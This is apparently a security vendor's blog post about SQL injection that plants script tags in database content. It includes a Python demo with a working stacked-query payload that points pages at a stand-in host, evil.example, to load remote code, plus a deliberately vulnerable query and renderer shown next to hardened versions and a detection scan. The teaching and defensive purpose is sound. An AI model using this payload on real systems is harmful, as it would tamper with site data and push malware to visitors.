As a follow-up to our ADC webinar on SQL Injection, led by our CTO, Amichai Shulman, I had an opportunity to meet with some of our customers and discuss the latest SQL Injection attack trends.
Our partner, AppSec Consulting, chose the location, which I admit was not to my liking. They chose an indoor gun range, and while for some people shooting stuff is the ultimate stress reliever, I'm not one of them. As a veteran Lieutenant of the Israel Defense Forces, shooting brings up some stressful memories. If you have never experienced shooting in an indoor range, let me tell you: it's scary. The sound produced by gunfire is deafening outdoors, but when the acoustical energy it produces is confined to a small indoor space such as a firing range, it gets even louder. Add to that the fact that some shooters are new to the experience, and some (not our customers) may be doing stupid, crazy things... oh, well. I stayed outside while the guys were having fun.
But as I mentioned, we also spent some time talking about SQL Injection attacks. When we talk about SQL Injection, we usually think about protecting the application with a web application firewall. Less often do we talk about the impact on the database behind the website. In the past, most SQL Injection attacks tried to pull valuable information out of the database, and in that case nothing on the RDBMS itself was compromised or changed. Lately, we are seeing more attacks that manipulate the content of the RDBMS. The example I used in my demo showed how SQL Injection can be used to write a JavaScript reference into the database's stored content: the injected statement appends a script tag to the data, and that tag points to a JS file on a separate domain under the attacker's control. Any web page that is built from the compromised data will then emit that tag, so every visitor's browser fetches and runs the remote script, downloading malicious code and silently distributing malware through the connected systems.
A compromised database entry:
The bottom line is that databases are a critical component of any web application, and when protecting the application you cannot ignore the database itself. Databases should be scanned and monitored continuously so that tampered content is caught before it reaches your users.
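To make the mechanics above concrete, here is an added example of my own, not code from the webinar, the demo, or any product. It uses an in-memory SQLite table with two constructed rows; the table and column names, the query shapes and the attacker domain evil.example are all assumptions. It walks through the stacked-query injection that appends a script tag to stored content, the page that then serves that tag to every visitor, the parameterized query and output encoding that close both halves of the problem, and a simple scan over every text column of the kind the "scan and monitor" advice calls for:

```python
"""Content-tampering SQL injection: planted <script> tags, the page that
serves them, the hardened versions, and a scan that finds the planted rows.

Everything here is constructed for illustration: schema, rows, query shapes
and the attacker host (evil.example) are assumptions, not data from any
real incident.
"""
import html
import sqlite3

# Constructed sample schema: a CMS-style table whose text ends up in web pages.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT NOT NULL, body TEXT NOT NULL);
INSERT INTO articles (title, body) VALUES
  ('Welcome', 'Hello, world.'),
  ('Pricing', 'Contact sales for a quote.');
"""

# Constructed attacker input: closes the open string literal, stacks an UPDATE
# that appends an external <script> to every stored body, then comments out
# whatever the application put after the injection point.
SCRIPT_TAG = '<script src="http://evil.example/m.js"></script>'
PAYLOAD = f"x'; UPDATE articles SET body = body || '{SCRIPT_TAG}'; --"


def new_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def search_vulnerable(conn, title):
    """Vulnerable: the user-supplied title is spliced into the SQL text.
    executescript() stands in for a driver/DBMS that runs stacked statements
    (MS SQL Server does); sqlite3's plain execute() would reject the second
    statement. A search should never be able to write, but this one can."""
    conn.executescript(f"SELECT id, body FROM articles WHERE title = '{title}'")


def search_safe(conn, title):
    """Hardened: bound parameter. The payload is just an odd title string; it
    matches nothing and is never parsed as SQL."""
    return conn.execute(
        "SELECT id, body FROM articles WHERE title = ?", (title,)).fetchall()


def _body(conn, article_id):
    return conn.execute(
        "SELECT body FROM articles WHERE id = ?", (article_id,)).fetchone()[0]


def render_page_vulnerable(conn, article_id):
    """Page built by raw concatenation: whatever sits in the database is
    emitted as markup, so a planted <script> runs in every visitor's browser."""
    return f"<html><body><p>{_body(conn, article_id)}</p></body></html>"


def render_page_safe(conn, article_id):
    """Contextual output encoding: the same tampered row renders as inert text.
    This limits the damage but does not undo the tampering; the row is still bad."""
    return f"<html><body><p>{html.escape(_body(conn, article_id), quote=True)}</p></body></html>"


def scan_for_script_tags(conn):
    """Walks every TEXT column of every table and reports (table, column, rowid)
    for rows holding markup a content column should never contain. Signature
    based, so it only catches what the signatures cover; a detective control."""
    findings = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' ORDER BY name")]
    for table in tables:
        # PRAGMA table_info rows: (cid, name, type, notnull, dflt_value, pk)
        cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')
                if (r[2] or "").upper() == "TEXT"]
        for col in cols:
            rows = conn.execute(
                f'SELECT rowid FROM "{table}" '
                f'WHERE lower("{col}") LIKE \'%<script%\' '
                f'   OR lower("{col}") LIKE \'%javascript:%\' '
                f'ORDER BY rowid').fetchall()
            findings.extend((table, col, r[0]) for r in rows)
    return findings


if __name__ == "__main__":
    db = new_db()
    print("safe search with payload:", search_safe(db, PAYLOAD))   # []
    search_vulnerable(db, PAYLOAD)                                 # one attacker request
    print("tampered rows:", scan_for_script_tags(db))
    print(render_page_vulnerable(db, 1))                           # serves the <script>
    print(render_page_safe(db, 1))                                 # escaped, inert
```

Two things worth noting. The scan only finds what its signatures describe; real mass-injection campaigns have wrapped their payloads in encoded strings and DBMS-specific casts, so pair the content scan with monitoring of the database activity itself, in particular any UPDATE or cursor-driven statement arriving over the web application's connection, which a search page has no business issuing. And the parameterized query is the fix for the write; output encoding only keeps an already-tampered row from executing in the browser.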
I hope our next event takes place at a less stressful location - perhaps even an outdoor gun range. How about paintball? I heard that's a lot of fun.